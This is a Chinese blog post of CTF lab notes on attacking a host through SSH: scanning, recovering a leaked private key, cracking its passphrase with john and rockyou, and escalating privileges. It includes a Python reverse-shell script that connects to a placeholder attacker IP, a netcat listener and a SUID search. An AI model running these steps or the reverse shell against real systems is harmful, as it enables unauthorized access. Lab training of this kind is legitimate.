CTF-SSH

最新推荐文章于 2024-05-01 21:50:53 发布
最新推荐文章于 2024-05-01 21:50:53 发布
阅读量3.2k 收藏 2
点赞数
分类专栏: 网络安全 文章标签: ssh linux 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45778981/article/details/122399202
版权

CTF-SSH(笔记+总结)

思路:对网络进行扫描,寻找可疑主机,对目标主机进行端口扫描,特别注意大端口和特殊端口,在端口中寻找关键文件、可疑文件,注意id_rsa,远程登录目标主机,判断获取用户类型,进行提权最终获取root用户,获取flag。

netdiscover -r ip/netmask
nmap -sV ip
nmap -A -v ip
nmap -O ip
dirb http://ip:端口
nikto -host ip
ssh -i id_rsa 用户名@ip
chmod 600 id_rsa
python /usr/share/john/ssh2john.py id_rsa > rsacrack
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
find / -perm -4000 2>/dev/null
netstat -pantu
nc -lvp 4445
git clone https://github.com/jeanphorn/common-password.git
./cupp.py -i
python -c "import pty;pty.spawn('/bin/bash')"
 

反弹shell
靶场代码
#!/usr/bin/python
import os,subprocess,socket

s=socket.socekt(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("攻击机ip","攻击机监听端口"))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh","-i"])

攻击机netcat命令
	nc -lvp 未占用端口(要一致攻击机监听端口)
查看占用端口 netstat -pantu

在这里插入图片描述

小侯同学ing
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全CTF流量分析-入门5-SSH登录流量和Linux基本操作流量_ssh登录成功流量
m0_60750088的博客
04-29 252
答案是192.168.246.28。
CTF-SSH私钥泄露(超详细)
wangzhemvp的博客
10-04 157
可以看到buf[20]变量,通过溢出来提权,输入超过他缓存字符长度的字符 超出的部分为root权限的目录路径。对于给定IP地址的靶机,我们需要对其扫描,探测到开放的服务信息。渗透其实是针对服务的漏洞探测,然后进行对应的数据包发送,获取机器的最高权限。一个服务器对应计算机的一个端口,常用端口0-1023,通过扫描结果查找特殊端口,特别是对于开放的http服务的大端口进行排查。进入到root里,发现两个文件,打开flag.txt文件,但是没有权限。通过查看 ,把/texes放到目录下,就找到第一个flag。
CTF-SSH私钥泄露
su__xiaoyan的博客
12-14 415
实验环境: 攻击者:Kali Linux(192.168.0.136) 靶机:Oracle VM VirtualBox 6.1.10——Debian(32-bit)(192.168.0.219) 实验流程: 实验环境导入方法参考链接: https://blog.csdn.net/su__xiaoyan/article/details/111143714 启动靶机,信息探测。 检测与靶机的网络连通性 端口探测,服务扫描 命令:nmap -sV 192.168.0.219 通过端口扫描结果,80端口
CTF-SSH协议介绍
weixin_41684949的博客
05-07 695
ssh为Secure Shell 的缩写由IETF的网络小组(Network Working Group)所制定;SSH为建立在应用层基础上的安全协议。ssh是目前较为可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用ssh协议可以有效防止远程管理过程中的信息泄露问题。ssh最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。ssh在正确使用时可弥补网络中的漏洞。ssh客户端适用...
CTF训练 ssh私钥泄露(含靶场下载地址)_ctf-ssh(2)
m0_60691292的博客
04-28 882
接着探查大端口的信息直接访问发现并没有什么内容使用dirb命令,这个服务的隐藏文件进行探测(此处格式为ip:端口),随便打开两个看看。可以看见,.ssh文件中隐藏了一些信息。打开需要密码打开一下其他的文件看看打开方式好像有点问题,直接用cat打开PS:这里看起来很像用户名。
2024年网络安全最新CTF训练 ssh私钥泄露(含靶场下载地址)_ctf-ssh
最新发布
2401_84281748的博客
05-01 40
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
CTF-5.SSH私钥泄露
woo233的博客
09-11 756
如何从外部进入最终root主机,取得flag。
CTF-SSH服务渗透
IT小学子的博客
05-02 732
CTF-SSH服务渗透信息探测对于SSH服务的22端口的靶场面对HTTP服务80端口开放的端口或者其他端口的靶场挖掘敏感信息对ssh密钥进行利用查看根目录文件寻找flagshell 监听暴力破解 信息探测 探测靶场开放的服务与服务的版本 nmap -sV ip地址 探测靶场全部信息 nmap -A -v IP地址 nmap -v -n -A www.baidu.com 探测靶场的操作系统类型与版...
CTF-SSH私钥泄露【超详细】
不知名白帽的博客
08-16 2132
SSH-私钥泄露【超详细】
CTF-SSH服务渗透代码详细解说
weixin_45441727的博客
03-01 950
首先,我们先理解什么是SSH协议 SSH是(Secure SHell protocol) 的简写,即(安全外壳协议)。由 IETF 的网络小组(Network Working Group)制定。 以前我们都是使用rsh和telnet的明文传输,这样的话登录时的ID和密码数据就会直接在网络上暴露,相当于你在网络上被别人看的一清二楚。存在安全上的问题。而SSH提供了加密、校验和压缩,使得我们可以很安全的进行远程操作。不过这并不是绝对的,总有加密文件被破解的一天。但是相对与明文加密,这样还是好很多的。毕竟有密码和
CTF训练之现学现卖--SSH私钥泄露-附件资源
03-02
CTF训练之现学现卖--SSH私钥泄露-附件资源
CTF-Writeups
05-16
CTF编写 该存储库是我为已解决的每个房间/机器编写的所有文章的集合。 文章和平台 Tryhackme 房间名称 难度级别 专注技能 :United_States: 难的 SSH隧道,SQL RCE,PATH变量Privesc Vulnhub 房间名称 难度级别 ...
Backdoor-CTF-Crypto-400.rar
09-30
"Backdoor-CTF-Crypto-400"可能是一个中级难度的题目,其难度级别为400,暗示着这可能是一个需要深入理解和应用密码学知识才能解决的问题。下面,我们将深入探讨可能涉及的密码学知识点。 1. **加密算法**:题目中...
CTF-WEB入门DOC-2019版1
08-03
7. 服务器管理:如SSH客户端,用于远程管理服务器。 六、成长路径: 从基础漏洞开始学习,通过实践不断提升,积极参与CTF比赛,遇到未知问题时,学会聪明地提问和自主寻找答案。当你能够独立解决大部分题目,理解并...
Burp的安装配置与启动
weixin_45778981的博客
05-17 1549
Burp的安装配置与启动 过程梳理: (1)安装jdk。 (2)启动burp-loader-keygen。 安装jdk –傻瓜式安装 直接点击就直接进入安装,不建议更改默认的安装路径,或者自己记住自己安装在哪里,一直next就可以了。 安装完成的亚子。 启动burp-loader-keygen (细节很重要) (1)点 burp-loder-keygen (2)点开以后是这样,点run (3)点I accept (4)把(1)中License的复制到小窗口中点next (5)点红圈那个 (6)把小窗口
用burp爆破tomcat 401 --(案例二)
weixin_45778981的博客
05-21 1265
用burp爆破tomcat 401—(案例) 此处 :作用是因为系统使用的是base64,转码需要加 不加勾选可能会在PayLoad那一栏出现符号
用burp做简易爆破 --(案例一)
weixin_45778981的博客
05-20 341
用burp做简易爆破 步骤 (1)初始界面 (2)抓取一下输入的用户名和密码 (3)发送至Intruder (4)按图中步骤 (5)按照图中步骤 (6)按照图中步骤 (7)结果图,共尝试了9组,也可以添加txt文件进行爆破 ...
用burp对网站进行简单的漏洞扫描
weixin_45778981的博客
05-24 324
用burp对网站进行简单的漏洞扫描
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。 一、Vulnhub简介 Vulnhub是一个开源的渗透测试平台,提供了多种类型的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值